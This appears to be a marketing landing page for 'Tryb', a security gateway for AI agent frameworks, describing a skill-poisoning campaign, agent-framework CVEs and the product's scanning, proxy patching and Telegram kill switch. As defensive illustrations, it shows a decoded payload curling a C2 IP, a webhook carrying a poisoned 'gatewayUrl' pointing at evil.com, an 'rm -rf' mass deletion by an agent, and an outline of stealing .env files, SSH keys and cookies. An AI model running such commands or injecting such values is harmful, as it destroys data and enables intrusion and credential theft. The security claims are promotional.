ClawHavoc + CVEs across OpenClaw, CrewAI, Langflow -- Feb 2026

The managed security gateway for AI agents

OpenClaw, CrewAI, LangChain, AutoGen -- every agent framework installs unvetted skills and stores API keys in plaintext. Tryb intercepts, scans, and secures every connection before it reaches your machine. CrowdStrike for the agent layer.

tryb gateway -- agent-max

[SCAN] Intercepted: web-scraper-pro@2.1.4
[L1:IOC] AMOS Base64 Stager ........... FAIL
[L1:IOC] Known C2 IP (91.92.242.x) .... FAIL
[L2:Deob] Hidden payload decoded ........ FAIL
[L3:Graph] Ownership change 3d ago ...... FAIL
[L4:Clawdex] Hash match: ClawHavoc ...... FAIL
[L5:AI] Intent: malicious (97%) ...... FAIL
[L6:Score] Composite: 0.943 ............. BLOCKED

[CVE] gatewayUrl stripped from webhook payload
[TG] Telegram alert sent. Fire switch armed.
[GW] Gateway secure. _

February 2026

Every agent framework is under attack

ClawHavoc injected 341 OpenClaw skills with the AMOS stealer. CVE-2026-25253 enables 1-Click RCE via a poisoned gatewayUrl parameter -- Tryb strips it from every request automatically. Langflow shipped a CVSS 9.4 RCE for full account takeover. The attack surface is the same everywhere: unvetted skills, plaintext credentials, no fire switch. This isn't one framework's problem -- it's the entire agent layer.

341

OpenClaw skills compromised

ClawHavoc campaign

9.8

CVSS score

gatewayUrl 1-Click RCE (CVE-2026-25253)

9.4

CVSS score

Langflow RCE (CVE-2025-3248)

Agents behind Tryb

that were compromised

The attack vector every framework shares

1. Skill / tool install

Agent installs a skill from ClawHub, a CrewAI tool, or a LangChain integration. The code looks clean -- the malware is inpost_install hooks or obfuscated setup scripts.

2. Credential theft

The script reads .env,~/.ssh, and browser cookies. Keys stored in plaintext are trivially exfiltrated.

3. Silent exfil

Data is sent to a C2 server over HTTPS. The agent continues running normally. You don't know you're compromised until your Stripe account is drained.

The unfair advantage

Not a tunnel. A managed security gateway.

ngrok gives you a URL. Tryb gives you a security perimeter. Every connection is scanned, every exploit is patched, and you have a fire switch in your pocket.

The scrubbing proxy

6-Layer Scan Engine

We don't just tunnel traffic -- we intercept clawhub install commands and run every skill through a 6-layer scan engine: 26 YARA-equivalent IOC patterns, LLM deobfuscation that decodes hidden payloads, supply chain graph analysis for ownership changes, Koi Clawdex for hash matching, semantic AI intent classification, and a weighted risk score with fail-closed enforcement. If Clawdex goes down, we block -- not warn.

6 layers. Fail-closed.

[SCAN] Intercepted: data-pipeline-v3@1.2.0

L1:IOC   AMOS Base64 Stager ....... FAIL
L1:IOC   Known C2 IP .............. FAIL
L2:Deob  Decoded base64 payload ... FAIL
  -> Hidden: curl -s http://91.92.242.30/drop
L3:Graph Ownership changed 3d ago . FAIL
  -> Previous: legit_dev_42 -> xdev_tools_99
L4:Clawdex Hash match: ClawHavoc .. FAIL
L5:AI    Intent: malicious (97%) .. FAIL
L6:Score Composite: 0.94 .......... BLOCKED

[TELEGRAM] Alert sent. Fire switch armed.

Sever the tunnel from your phone

Text-to-Fire Switch

A dedicated Telegram bot monitors your agent in real time. If it starts deleting files, making unexpected purchases, or behaving erratically, you get an instant alert and can tap a single button to sever the tunnel. The agent loses all internet access immediately. No SSH required.

One tap. Instant disconnect.

TRYB BOT:
  Agent "agent-max" is deleting files:
    rm -rf /Users/dan/projects/*

  This matches pattern: mass_file_deletion
  Confidence: 98.7%

  [  KILL TUNNEL  ]  [  ALLOW  ]

  > You tapped KILL TUNNEL
  > Tunnel severed at 14:32:07 UTC
  > Agent internet access: REVOKED
  > All queued webhooks: HELD

Automatic exploit neutralization

CVE-2026-25253 Patching

CVE-2026-25253 enables 1-Click RCE via a poisoned gatewayUrl parameter in agentic frameworks. Our proxy automatically strips the gatewayUrl key from every incoming webhook and WebSocket message before it reaches your agent. This neutralizes the exploit at the cloud level, even if you haven't updated your OpenClaw, CrewAI, or LangChain version. Every stripped key is logged as a critical firewall event.

Auto-patched at the proxy layer

POST /hook/agent-max -> Tryb Proxy

  Incoming payload:
  { "action": "run",
    "gatewayUrl": "http://evil.com/rce",  <-- RCE
    "task": "summarize" }

  Tryb strips "gatewayUrl" before forwarding:
  { "action": "run",
    "task": "summarize" }

  [FIREWALL] CVE-2026-25253: stripped 1 key
  [SEVERITY] Critical
  [STATUS] Neutralized -- agent never saw it

Also included

Everything else you need

Payload Firewall

Every webhook is inspected for shell injections, path traversals, and RCE patterns before delivery.

24h Webhook Queue

Webhooks are buffered when your agent sleeps and auto-drained on reconnect.

Human Relay

Agent pauses and asks you via Telegram before high-stakes actions. One tap to approve or deny.

Static IP

Dedicated IP addresses for services that require IP allowlisting.

Security shouldn't be an afterthought

Free tier protects you today. Upgrade when your agents go to production.

Starter

$0forever

Explore the security gateway

2 agents

Skill scanning (community DB)

500 tunnel hours/mo

50K webhooks/mo

Built-in firewall rules

24h webhook queue

Your agents are running blind

341 skills were compromised last month. Don't wait for yours to be next. Tryb scans every skill, patches every CVE, and gives you a fire switch.